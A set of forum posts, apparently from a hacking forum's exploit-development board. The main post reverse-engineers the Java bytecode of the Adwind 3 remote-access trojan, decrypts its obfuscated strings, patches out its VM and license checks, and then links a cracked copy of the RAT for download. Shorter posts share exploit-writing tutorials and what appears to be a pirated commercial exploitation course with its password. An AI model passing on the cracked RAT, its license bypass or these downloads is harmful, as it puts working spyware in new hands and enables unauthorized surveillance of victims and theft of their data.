references are then used to invokespecial (call) 4 methods and in the end null gets returned – Remember the stack is based on the LIFO (last in, first out) principle. All of those functions are void methods, which means that they don’t return anything to the stack. At this pont, you also see another annoying feature of Allatori, the renaming of foreign methods and classes - B() doesn’t ring any bells, does it? And it gets even worse… If we look for the B() method, we notice that there is not just one, but three of them! This is possible because the JVM allows methods of the same name with different descriptors. Those are the three B() method in question: static synthetic void B(cliente.Login, java.awt.event.ActionEvent) private synthetic void B() private synthetic void B(java.awt.event.ActionEvent) Since we know that no parameters got pushed to the B() method when it was called above we have to look at the second method, void B(). I won’t post all 381 lines but point out some important aspects. 0000004E : new javax.swing.JButton 00000051 : dup 00000052 : invokespecial void javax.swing.JButton.() 00000055 : putfield javax.swing.JButton cliente.Login.g 00000058 : new javax.swing.JPanel Aha! A button. This leads us in the right direction, but since there are multiple buttons and ‘cliente.Login.g’ isn’t telling us much, we need to look for another way to identify it. How about the text of the button shown to the user? It has to get set somewhere, does it? [...] 00000052 : invokespecial void javax.swing.JButton.() 00000055 : putfield javax.swing.JButton cliente.Login.g 00000058 : new javax.swing.JPanel [...] 00000105 : getfield javax.swing.JButton cliente.Login.g 00000108 : ldc_w " F0@9" 0000010B : invokestatic java.lang.String Extras.MD5.ALLATORI_DEMO(java.lang.String) 0000010E : invokevirtual void javax.swing.JButton.setText(java.lang.String) 00000111 : getfield javax.swing.JButton cliente.Login.g String deobfuscation – the lazy way Well, this part definitively sets some text on the button, and it also loads a string, but the string looks kinda strange, and there is another function in between of the loading of the string (ldc_w ” F0@9? and the text-setting (invokevirtual .setText(java.lang.String) which also takes a string as its parameter. This means that the mysterious ALLATORI_DEMO(String) function probably takes ‘garbage’ as input and returns a more useful string which then gets used to perform whatever operation. In Java, it might look like this: g.setText(Extras.MD5.ALLATORI_DEMO(" F0@9")); This happens for every single usage of strings, only with different methods, which means that we just figured out where strings get deobfuscated. The way Allatori deobfuscates strings got analyzed before, actually it’s pretty simple. The method iterates through the strings characters backwards and performs XOR and AND bit-operations on them – the result gets stored in a array which then gets converted and returned as a string. Due to it’s nature, it’s possible to revert the obfuscation by applying the same method again. However the program which we are looking at is using Allatori 4.7, and here things changed a little. The actual obfuscation is more or less the same, but the key used in it is not simply pushed to the stack but calculated using different stack operations. This, and the fact that Allatori 4.7 uses multiple string obfuscation methods (with different keys) in the same method make it harder to deobfuscate the program by going through all strings automatically. But there is a good message – we don’t even need to get our hands dirty with all of this! Since class file functions can easily used in other Java programs and Allatori didn’t bother to include some asymmetric encryption method we can import the class file (or the whole Jar) to a new Java program and call the method like any other to both de- and encrypt strings. System.out.println(Extras.MD5.ALLATORI_DEMO("F0@9")); -> Login System.out.println(Extras.MD5.ALLATORI_DEMO("Login")); -> F0@9 Because some encrypted strings contain line breaks and Java doesn’t support raw strings you might encounter some problems – you can partially fix this by enabling automated escaping when pasting text between string literals in Eclipse (Preferences -> Java -> Editor -> Typing. As we can see thanks to the deobfuscated string, the button text gets indeed set to ‘Login’. Now we just have to find out which EventHandler get’s associated to it. 00000111 : getfield javax.swing.JButton cliente.Login.g 00000114 : new cliente.i 00000117 : dup 00000118 : aload_0 00000119 : invokespecial void cliente.i.(cliente.Login) 0000011C : invokevirtual void javax.swing.JButton.addActionListener(java.awt.event.ActionListener) Here we go. A new instance of class i gets created, initialized and ‘added’ to the JButton as an ActionListener. When the button gets clicked, the instances method ‘ActionPerformed’ gets called… 00000000 : aload_0 00000001 : getfield cliente.Login cliente.i.ALLATORI_DEMO 00000004 : aload_1 00000005 : invokestatic void cliente.Login.ALLATORI_DEMO(cliente.Login, java.awt.event.ActionEvent) 00000008 : return ..which calls ALLATORI_DEMO(cliente.Login, java.awt.event.ActionEvent) in our Login-Class… 00000000 : aload_0 00000001 : aload_1 00000002 : invokespecial void cliente.Login.B(java.awt.event.ActionEvent) 00000005 : return which finally calls cliente.Login.B(ActionEvent). What a ride! // check if Username-Textfield is empty 00000000 : getstatic javax.swing.JTextField cliente.Login.user 00000003 : invokevirtual java.lang.String javax.swing.JTextField.getText() 00000006 : invokevirtual boolean java.lang.String.isEmpty() // returns boolean 00000009 : ifeq pos.0000000E // if result is 0 (Field is NOT empty -> jump 0000000C : return // avoid 0000000D : pop // check if Password-Field is empty 0000000E : new java.lang.String // create new string 00000011 : dup 00000012 : getstatic javax.swing.JPasswordField cliente.Login.password 00000015 : invokevirtual char[] javax.swing.JPasswordField.getPassword() 00000018 : invokespecial void java.lang.String.(char[]) 0000001B : invokevirtual boolean java.lang.String.isEmpty() 0000001E : ifeq pos.00000023 00000021 : return // avoid again // check if any license got selected in ComboBox (Index is not -1 / m1 00000022 : iconst_0 00000023 : getstatic javax.swing.JComboBox cliente.Login.listalicencias 00000026 : invokevirtual int javax.swing.JComboBox.getSelectedIndex() 00000029 : iconst_ml 0000002A : if_icmpne pos.0000002E 0000002D : return // meh. 0000002E : aload_0 // // 'hide' the login-window and call Adwind.main(null) -> the main window? 0000002F : invokevirtual void cliente.Login.dispose() 00000032 : aconst_null 00000033 : invokestatic void cliente.Adwind.main(java.lang.String[]) 00000036 : return I already made some comments so it should be pretty clear what’s going on here – some checks if there is any input – but no _real_ checks, no web request. If we patch the return above the main(null)call (triggered by no license being selected) to nop (do nothing / 00), run the program and enter some garbage, the progress calls the main method and then closes. This means that the login/license check is not in the Login-class at all but in another castle, somewhere in that / or main() method of Adwind.main Another castle I will cut things down a bit at this point since finding the method isn’t really anything new – after some minutes you should have found an Adwind.B() – call at the top of Adwind.<init> which begins with this lovely VM-Check.. 00000000 : invokestatic boolean Extras.Utils.isVMWARE() 00000003 : ifne pos.0000000C // jump if isVMWARE == 1 00000006 : invokestatic boolean Extras.Utils.isVMWARE() 00000009 : ifeq pos.00000010 // jump if isVMWARE == 0 0000000C : iconst_ml 0000000D : invokestatic void java.lang.System.exit(int) // we don't want to land here ..and also the reason why Adwind closed without any warning when entering wrong credentials: // Store InetAdress "65.99.225.111" in var1 00000033 : ldc_w "0<+7+4" 00000036 : invokestatic java.lang.String cliente.NoIpService.ALLATORI_DEMO(java.lang.String) 00000039 : invokestatic java.net.InetAddress java.net.InetAddress.getByName(java.lang.String) 0000003C : astore_1 // Store InetAdress "adwind.com.mx" -> IP in var 2 0000003D : ldc_w "S(E%\(/]!!J" 00000040 : invokestatic java.lang.String plugins.CargadorPlugins.ALLATORI_DEMO(java.lang.String) 00000043 : invokestatic java.net.InetAddress java.net.InetAddress.getByName(java.lang.String) 00000046 : astore_2 // Load and compare those InetAdresses 00000047 : aload_1 00000048 : aload_2 00000049 : invokevirtual boolean java.net.InetAddress.equals(java.lang.Object) 0000004C : ifeq pos.00000060 // if not equal (If adwind.com.mx doesn't resolve to 65.99.225.111) jump As you can see, the method checks if ‘adwind.com.mx’ resolves to a hardcoded IP adress, probably to detect DNS-manipulation. Since the domain isn’t up anymore, the request will fail, even for valid customers (great!) The method also generates a kind of hwid and issues a web request to the login server using a horrible case switch taking about 200 lines, but I will spare you that. Instead, why don’t we just try to nop the invoke of B() in the first place? Since it only checks conditions to exit, this actually works. If we also change the Main-Class in the Jar-manifest, we can even skip the whole login-window. PS: Found this in the Login.main class: 0000000C ldc_w "s9V%F#@5q9W?<^-K[?F" // AuditoryCues.playlist <- Java Swing-Ebook CopyPasta 0000000F invokestatic java.lang.String plugins.CargadorPlugins.ALLATORI_DEMO(java.lang.String) 00000012 ldc_w "h"M>]8[.j"L$6E;h"M>]8[.j"L$" // AuditoryCues.allAuditoryCues <- Srsly? Why I am even cracking this... // initialize java swing UI-Manager in an absolute innovative way 00000015 invokestatic java.lang.String Extras.MD5.ALLATORI_DEMO(java.lang.String) 00000018 invokestatic java.lang.Object javax.swing.UIManager.get(java.lang.Object) 0000001B invokestatic java.lang.Object javax.swing.UIManager.put(java.lang.Object, java.lang.Object) You might wonder what’s the connection of Auditory, a music editor and Adwind, a ‘Premium’RAT. Answer: Complete Copy Pasta. Magic with Merlin: Swinging audio Cracked Version : http://www.mediafire.com/download/bzwv870uovbujci/Adwind3.zip Source : Cracking obfuscated Java Code – Adwind 3 | boredliner Best Regrads NO-MERCY Note : If Any One Have Plugins for this Version pls share it with us Thanks
-
Reverse Engineering for Beginners
NO-MERCY replied to Usr6's topic in Reverse engineering & exploit development
Special Thanks usr6 .. That's very very Good Greetings -
Hello RST ... Nish Bhalla, 2005 (Nish[a-t]SecurityCompass.com) Home ? Security Compass #------------------------------------------------# Writing Stack Based Overflows on Windows #------------------------------------------------# Introduction ------------- This series focuses on writing stack based overflows for windows. Before we get into writi exploits, is important to get some basic concepts cleared up. The first of this multipart article will focus on explaining the basic concepts of how a executable is loaded into memory and executed. The second part will focus on basic assembly instructions, The third part will delve into what stack overflows are, why they exists and how to write exploits for vulnerable applications for a local exploit The part four will show how to write your own shellcode and how to exploit a remote buffer overflow. Contents : ---------- Part I – Basic Concepts Part II - Windows Assembly for writing Exploits Part III - Stack Overflows Part IV – Shell Code Creation and Exploiting An Application Remotely Download : http://www.4shared.com/rar/NH7R1tx3ba/Writing_Stack_Based_Overflows_.html Best Regrads #----- NO-MERCY -----#
-
Hello RST : Today i'm finished pdf's with new "part 6 : seh exploits" permission from author Windows Exploit Development – Part 1: The Basics MD5: 395261B0EDFA0FFE9CE9A9DE6BF683FF Windows Exploit Development – Part 2: Intro to Stack Based Overflows MD5: AA492D49F1557DCCCE12BE20991044C4 Windows Exploit Development – Part 3: Changing Offset and Rebased Modules MD5: 545B999CB769FCA63827A2B0509D759E Windows Exploit Development – Part 4: Locating Shellcode with Jumps MD5: E2C5B9330A634464A0D2F42104787639 Windows Exploit Development – Part 5: Locating Shellcode with Egghunting MD5: B6CDF4BA11E5185CAF188FFDECD400F0 Windows Exploit Development – Part 6: SEH Exploits MD5: 62C712F00E601B38AA83394E5AC95DBE Next pdf's : Exploit Development - Fuzzysecurity Project shellcode (AIO) Book The Grey Corner #------ Best Regrads ------# #------ NO-MERCY ------#
-
Hello RST ... This book about "AWE" Advanced Windows Exploitation V1.1 Offensive Security #----------------------# Table of Contents #----------------------# Module 0x00 Introduction _ Module 0x01 Egghunters _ Lab Objectives _ Overview _ Exercise 1-1 MS08-067 Vulnerability _ MS08-067 Case Study: Crashing the Service _ MS08-067 Case Study: Finding the Right Offset _ MS08-067 Case Study: From PoC to Exploit _ Controlling the Execution Flow _ Getting our Remote Shell _ Wrapping Up Module 0x02 Bypassing NX _ Lab Objectives _ A Note from the Authors - Overview _ Hardware-Enforcement and the NX Bit _ Hardware-Enforced DEP Bypassing Theory Part I _ Hardware-Enforced DEP Bypassing Theory Part II _ Hardware-Enforced DEP on Windows 2003 Server SP2 _ MS08-067 Case Study: Testing NX Protection _ Exercise _ MS08-067 Case Study: Approaching the NX Problem _ MS08-067 Case Study: Memory Space Scanning _ MS08-067 Case Study: Defeating NX _ Exercise _ MS08-067 Case Study: Returning into our Buffer _ Exercise _ Wrapping Up Module 0x02 (Update) Bypassing DEP AlwaysOn Policy _ Lab Objectives _ Overview _ Ret2Lib Attacks and Their Evolution _ Return Oriented Programming Exploitation _ Immunity Debugger’s API and findroppy _ Exercise _ ASLR _ PHP 60 Dev Case Study: The Crash _ PHP 60 Dev Case Study: The ROP Approach _ PHP 60 Dev Case Study: Preparing the Battlefield _ Exercise _ PHP 60 Dev Case Study: Crafting the ROP Payload _ Steps 1 and 2 _ Steps 3 and 4 _ Step 5 _ PHP 60 Dev Case Study: Getting our Shell _ Exercise _ Deplib: Gadgets on Steroids _ Classification _ Searching the Database _ Stack Pivoting _ Wrapping Up Module 0x03 Custom Shellcode Creation _ Lab Objectives _ Overview _ System Calls and “The Windows Problem” _ Talking to the Kernel _ Finding kernel32dll: PEB Method _ Exercise _ Resolving Symbols: Export Directory Table Method _ Working with the Export Names Array _ Computing Function Names Hashes _ Fetching Function's VMA _ MessageBox Shellcode _ Exercise _ Position Independent Shellcode (PIC) _ Exercise _ Shellcode in a Real Exploit _ Exercise _ Wrapping Up Module 0x04 Venetian Shellcode _ Lab Objectives _ Overview _ The Unicode Problem _ The Venetian Blinds Method _ Exercise _ DivX Player 66 Case Study: Crashing the Application _ Exercise _ DivX Player 66 Case Study: Controlling the Execution Flow _ Exercise _ DivX Player 66 Case Study: The Unicode Payload Builder _ DivX Player 66 Case Study: Getting our Shell _ Exercise Module 0x05 Kernel Drivers Exploitation _ Lab Objectives _ Overview _ Windows I/O System and Device Drivers _ Communicating with drivers _ I/O Control Codes _ Privilege Levels and Ring0 Payloads _ Staging R3 Payloads from Kernel Space _ Case Study Payloads _ Case Study Payload (1): Token Stealing _ Case Study payload (2): MSR Hooking _ Function Pointer Overwrites _ avast! Case Study: Kernel Memory Corruption _ avast! Case Study: Way Down in ring0 Land _ Exercise _ avast! Case Study: Bypassing Device Driver Checks _ Exercise _ avast! Case Study: EIP Hunting _ Exercise _ avast! Case Study: Elevation (1) _ Exercise _ avast! Case Study: Elevation (2) _ Exercise _ Wrapping up Module 0x06 64-bit Kernel Driver Exploitation _ Lab Objectives _ Overview _ 64-bit Address Space _ 64-bit Main Enhancements _ Windows-On-Windows Emulation _ 64-bit Exploitation: General Concepts _ MS11-080 Case Study: The Bug _ MS11-080 Case Study: IOCTL Hunting _ MS11-080 Case Study: Triggering the vulnerable code _ Exercise _ MS11-080 Case Study: Mapping your Route _ MS11-080 Case Study: “BSODing” the Box _ Exercise _ MS11-080 Case Study: Owning RIP _ MS11-080 Case Study: You are on your Own Bring me a SYSTEM Shell! Module 0x07 Heap Spraying _ Lab Objectives _ Overview _ JavaScript Heap Internals Key Points _ Heap Spray: The Technique _ Heap Spray Case Study: CVE-2011-2371 POC _ Exercise _ Heap Spray Case Study: A Deeper Look at the Bug _ Heap Spray Case Study: Mapping the Object in Memory _ Exercise _ Heap Spray Case Study: Controlling the Execution Flow _ Exercise _ Heap Spray Case Study: Stack Pivoting _ Exercise _ Heap Spray Case Study: Pointers Stunts _ Exercise _ Heap Spray Case Study: When 1bit = Shell _ Exercise _ Wrapping Up Download link : "AWE" Advanced Windows Exploitation V1.1 size : 33 Mb parts : 4 pdf's pages : 185 password : NO-MERCY Best Regrads
-
Hello RST .... _ This Another One of Windows Exploit Development Tutorial Series _ FuzzySecurity (2012 \ 2013) _ FuzzySecurity | Home Table of Contents : ================= Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] Best Regrads NO-MERCY
-
- 1
-
your Tutorials NEOX Its the best and iam at rst because that ... if you think about translate it in En after Finished it It will vs Corelan Tuts & all sites will talking about that i know it hard work & its take long time .. Appreciate That view Days ago im find Great Paper but in spainish about "Software Exploitation" I workining to translate it .. its realy good sorry 4 weak en "bad :("
-
Hello RST ... This is New series of posts on Windows Exploit Development Written by: Mike Czumak Security Sift | Sifting through the world of Information Security, one bit at a time Special Thanks Mike I Appreciate That Great Work Table of Contents : Windows Exploit Development – Part 1: The Basics Windows Exploit Development – Part 2: Intro to Stack Based Overflows Windows Exploit Development – Part 3: Changing Offset and Rebased Modules Windows Exploit Development – Part 4: Locating Shellcode with Jumps Windows Exploit Development – Part 5: Locating Shellcode with Egghunting I'll Prepare it as PDF's (sooon Best Regrads NO-MERCY
-
Hello .... RST I'm Find very interesting wiki about " Exploit Dev " References to vulnerability exploitation stuff. Exploitation - it-sec-catalog - References to vulnerability exploitation stuff. - Gathering references to IT-security related stuff. - Google Project Hosting SRC => http://code.google.com/p/it-sec-catalog/wiki/Exploitation check it out see u
-
- 2
-
Buffer Overflow Inside
NO-MERCY replied to neox's topic in Reverse engineering & exploit development
Thanks 4 that Mr.Neox -
Buffer Overflow Inside
NO-MERCY replied to neox's topic in Reverse engineering & exploit development
ha ha .. i like your way in Tuts its awesome i saw same few weeks ago Hacker Course Buffer Overflow - A Practical Example (with Exploit) Auther : Marcelo Carvalho its really good Examples 4 your own :- Server-Memcpy & Server-Strcpy 1- http://code.securitytube.net/Server-Memcpy.exe 2- http://code.securitytube.net/Server-Strcpy.exe src : securitytube.net Regrads Mr Neox :- some ??? pls Whats the next lesson in your Primer "Exploit Dev" ? whats Different between "Dep" in win 7 & win 8 ? Thanks ...:) -
Tilon/SpyEye2 intelligence report
NO-MERCY replied to Usr6's topic in Reverse engineering & exploit development
Thanks usr6 i will try to collect it again Regrads